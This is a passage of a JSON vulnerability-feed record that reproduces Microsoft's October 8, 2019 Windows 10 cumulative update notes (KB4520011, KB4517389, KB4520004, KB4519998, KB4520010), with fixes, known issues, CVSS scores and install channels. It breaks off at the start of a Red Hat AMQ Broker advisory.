cumulative update 4520011</a>.\u00a0</p></body></html>", "modified": "2019-10-08T17:02:42", "id": "KB4520011", "href": "https://support.microsoft.com/en-us/help/4520011/", "published": "2019-10-08T15:53:25", "title": "October 8, 2019\u2014KB4520011 (OS Build 10240.18368)", "type": "mskb", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-12T22:46:32", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4517389, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Note\u00a0</strong>Follow <a href=\"https://twitter.com/windowsupdate\" rel=\"noreferrer noopener\" tabindex=\"-1\" target=\"_blank\" title=\"https://twitter.com/windowsupdate\">@WindowsUpdate</a> to find out when new content is published to the release information dashboard.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span><strong>Note </strong>This release also contains updates for Microsoft HoloLens (OS Build 18362.1034) released October 8,\u00a02019.\u00a0</span>Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">ePub support ending in Microsoft Edge</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft Edge will end support for e-books that use the .epub file extension over the next several months. For more information, see <a href=\"https://support.microsoft.com/help/4517840\" managed-link=\"\" target=\"_blank\">Download an ePub app to keep reading e-books</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a data-content-id=\"824684\" data-content-type=\"article\" href=\"\" managed-link=\"\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li><li>Updates for\u00a0storing and managing files.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Windows Shell, Internet Explorer, Microsoft Edge, Windows App Platform and Frameworks, Windows Cryptography, Windows Authentication, Windows Storage and Filesystems, Windows Kernel, Microsoft Scripting Engine, and Windows Server.</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div>Microsoft is not currently aware of any issues with this update.</div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU\u00a0and applying Microsoft security fixes. For more information, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4521863\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521863</a>) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4517389\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10, version 1903 and later</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/8/4/2/8429fc89-053b-4fc3-865b-2728f4346f48/KB4517389_V1.009.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4517389</a>.\u00a0</p></body></html>", "modified": "2019-10-08T17:00:28", "id": "KB4517389", "href": "https://support.microsoft.com/en-us/help/4517389/", "published": "2019-10-08T15:51:31", "title": "October 8, 2019\u2014KB4517389 (OS Build 18362.418)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-12T22:57:46", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4520004, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Reminder\u00a0</strong>March 12 and April 9\u00a0were the last two Delta updates for Windows 10, version\u00a01709. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our <a href=\"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426\" managed-link=\"\" target=\"_blank\">blog</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong><span>Reminder</span></strong><span>\u00a0Windows 10, version 1709, reached end of service on April 9, 2019 for devices running Windows 10 Home, Pro, Pro for Workstation, and IoT Core editions. These devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong><span><span>IMPORTANT\u00a0</span></span></strong><span><span>Windows 10 Enterprise, Education, </span></span><span>and IoT Enterprise</span><span><span> editions will </span></span><span>continue to <span>receive </span>servicing for 12 months<span> at no cost</span></span>\u00a0per the\u00a0lifecycle announcement on October 2018.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">ePub support ending in Microsoft Edge</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft Edge will end support for e-books that use the .epub file extension over the next several months. For more information, see <a href=\"https://support.microsoft.com/help/4517840\" managed-link=\"\" target=\"_blank\">Download an ePub app to keep reading e-books</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a data-content-id=\"824684\" data-content-type=\"article\" href=\"\" managed-link=\"\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li></ul><ul><li>Updates for\u00a0storing and managing files.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in the Keyboard Lockdown Subsystem that may not filter key input correctly.</li><li>Addresses an issue with the Bluetooth hardening updates, released August 13, 2019, that may cause a\u00a0\"0x133 DPC_WATCHDOG_VIOLATION\" error.</li><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Windows Shell, Microsoft Edge, Internet Explorer, Windows App Platform and Frameworks, Windows Cryptography, Windows Authentication, Windows Datacenter Networking, Windows Storage and Filesystems, Microsoft JET Database Engine, Windows Kernel, Microsoft Scripting Engine, and Windows Server.</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For more information, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4521860\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521860</a>) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4520004\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/b/0/b/b0b41de2-17bc-4fd8-a734-9d3df7414455/KB4520004_V1.007.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4520004</a>.\u00a0</p></body></html>", "modified": "2019-10-08T17:00:07", "id": "KB4520004", "href": "https://support.microsoft.com/en-us/help/4520004/", "published": "2019-10-08T15:45:44", "title": "October 8, 2019\u2014KB4520004 (OS Build 16299.1451)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-12T22:56:34", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4519998, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong><span>Reminder</span></strong><span>\u00a0The additional servicing for Windows 10 Enterprise,\u00a0<span>Education, and\u00a0</span>IoT Enterprise editions ended\u00a0on April 9, 2019 and doesn't extend beyond this date. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Reminder\u00a0</strong>March 12 and April 9 were the last two Delta updates for Windows 10, version\u00a01607. For Long-Term Servicing Branch (LTSB) customers, security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our <a href=\"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426\" managed-link=\"\" target=\"_blank\">blog</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span><em>Windows 10, version 1607, reached end of service on April 10, 2018. Devices running Windows 10 Home or Pro editions will no longer receive monthly security and quality updates that contain protection from the latest security threats. </em><em>To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</em></span></p><p><strong><span><span><span>IMPORTANT</span></span></span><span><span><span>\u00a0</span></span></span></strong><span><span>Windows 10 Enterprise and Windows 10 Education editions will receive\u00a0 additional servicing at no cost until April 9, 2019. Devices on the Long-Term Servicing Channels (LTSC) will continue to receive updates until October 2026\u00a0per the <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/lifecycle/search?alpha=Windows%2010\" managed-link=\"\" target=\"\">Lifecycle Policy page</a>. Windows 10 Anniversary Update (v. 1607) devices running the Intel \u201cClovertrail\u201d chipset will continue to receive updates until January 2023 per the <a data-content-id=\"\" data-content-type=\"\" href=\"https://answers.microsoft.com/{lang-locale}/windows/forum/windows_10-windows_install/intel-clover-trail-processors-are-not-supported-on/ed1823d3-c82c-4d7f-ba9d-43ecbcf526e9?auth=1\" managed-link=\"\" target=\"_blank\">Microsoft Community blog</a>.</span></span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><em><span>Windows Server 2016 Standard edition, Nano Server installation option and Windows Server 2016 Datacenter edition, Nano Server installation option </span></em><em><span><span>reached end of service on October 9, 2018</span></span></em><span><span>.<em> These editions will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</em></span></span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><em><span><span><span>Windows 10 Mobile, version 1607, reached end of service on October 8, 2018. Devices running Windows 10 Mobile and Windows 10 Mobile Enterprise will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</span></span></span></em></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a data-content-id=\"824684\" data-content-type=\"article\" href=\"\" managed-link=\"\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li></ul><ul><li>Updates for\u00a0storing and managing files.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Windows Server, Microsoft Scripting Engine, Internet Information Services, Windows Kernel, Microsoft JET Database Engine, Windows Storage and Filesystems, Windows Authentication, Windows Cryptography, Microsoft Edge, and Internet Explorer .</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't\u00a0apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>After installing <a data-content-id=\"4467684\" data-content-type=\"article\" href=\"\" managed-link=\"\">KB4467684</a>, the cluster service may fail to start with the error \u201c2245 (NERR_PasswordTooShort)\u201d if the group policy \u201cMinimum Password Length\u201d is configured with greater than 14 characters.</td><td><p>Set the domain default \"Minimum Password Length\" policy to less than or equal to 14 characters.</p><p>Microsoft is working on a resolution and will provide an update in an upcoming release.</p></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For more information, see\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU\u00a0(<a data-content-id=\"4521858\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521858</a>) will be offered to you automatically.\u00a0To get the standalone package for the latest\u00a0SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4519998\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/e/7/6/e76484cb-b1c1-4fbe-b962-a8efee43da4b/KB4519998_V1.009.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4519998</a>.\u00a0</p></body></html>", "modified": "2019-10-08T17:02:40", "id": "KB4519998", "href": "https://support.microsoft.com/en-us/help/4519998/", "published": "2019-10-08T15:44:11", "title": "October 8, 2019\u2014KB4519998 (OS Build 14393.3274)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-12T22:57:23", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4520010, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong><span><span><span>IMPORTANT</span></span></span><span><span><span>\u00a0</span></span></span></strong><span><span><span>Windows 10 Enterprise and Windows 10 Education editions reached end of service on October 8, 2019.\u00a0<span><span><span><span> To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10</span></span></span><em><span><span><span>.</span></span></span></em></span></span></span></span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Reminder\u00a0</strong>March 12\u00a0and April 9 were the last two Delta updates for Windows 10, version\u00a01703. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our <a href=\"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426\" managed-link=\"\" target=\"_blank\">blog</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span><em><span><span><span><span>Windows 10, version 1703, reached end of service on October 8, 2018</span></span></span></span></em><em><span><span><span>. Devices running Windows 10 Home, Pro, Pro for Workstation, and IoT Core editions will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</span></span></span></em></span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><em>Windows 10 Mobile, version 1703, reached end of service on June 11, 2019. Devices running Windows 10 Mobile and Windows 10 Mobile Enterprise will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</em></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">ePub support ending in Microsoft Edge</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft Edge will end support for e-books that use the .epub file extension over the next several months. For more information, see <a href=\"https://support.microsoft.com/help/4517840\" managed-link=\"\" target=\"_blank\">Download an ePub app to keep reading e-books</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a data-content-id=\"824684\" data-content-type=\"article\" href=\"\" managed-link=\"\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and\u00a0Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li><li>Updates for\u00a0storing and managing files.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Microsoft Edge, Internet Explorer, Windows App Platform and Frameworks, Windows Cryptography, Windows Authentication, Windows Datacenter Networking, Windows Storage and Filesystems, Microsoft JET Database Engine, Windows Kernel, Microsoft Scripting Engine, and Windows Server .</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u00a0For more information, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" target=\"_blank\">Servicing stack updates</a>.\u00a0</p><p>If you are using Windows Update, the latest SSU\u00a0(<a data-content-id=\"4521859\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521859</a>) will be offered to you automatically.\u00a0To get the standalone package for the latest\u00a0SSU, search for it in the <a href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4520010\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/c/f/ccf3f7a0-a082-4023-8007-2d50357d103d/KB4520010_V1.007.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4520010</a>.\u00a0</p></body></html>", "modified": "2019-10-08T17:06:17", "id": "KB4520010", "href": "https://support.microsoft.com/en-us/help/4520010/", "published": "2019-10-08T15:43:47", "title": "October 8, 2019\u2014KB4520010 (OS Build 15063.2108)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-10-10T07:30:58", "bulletinFamily": "unix", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* Apache Struts 1: Class 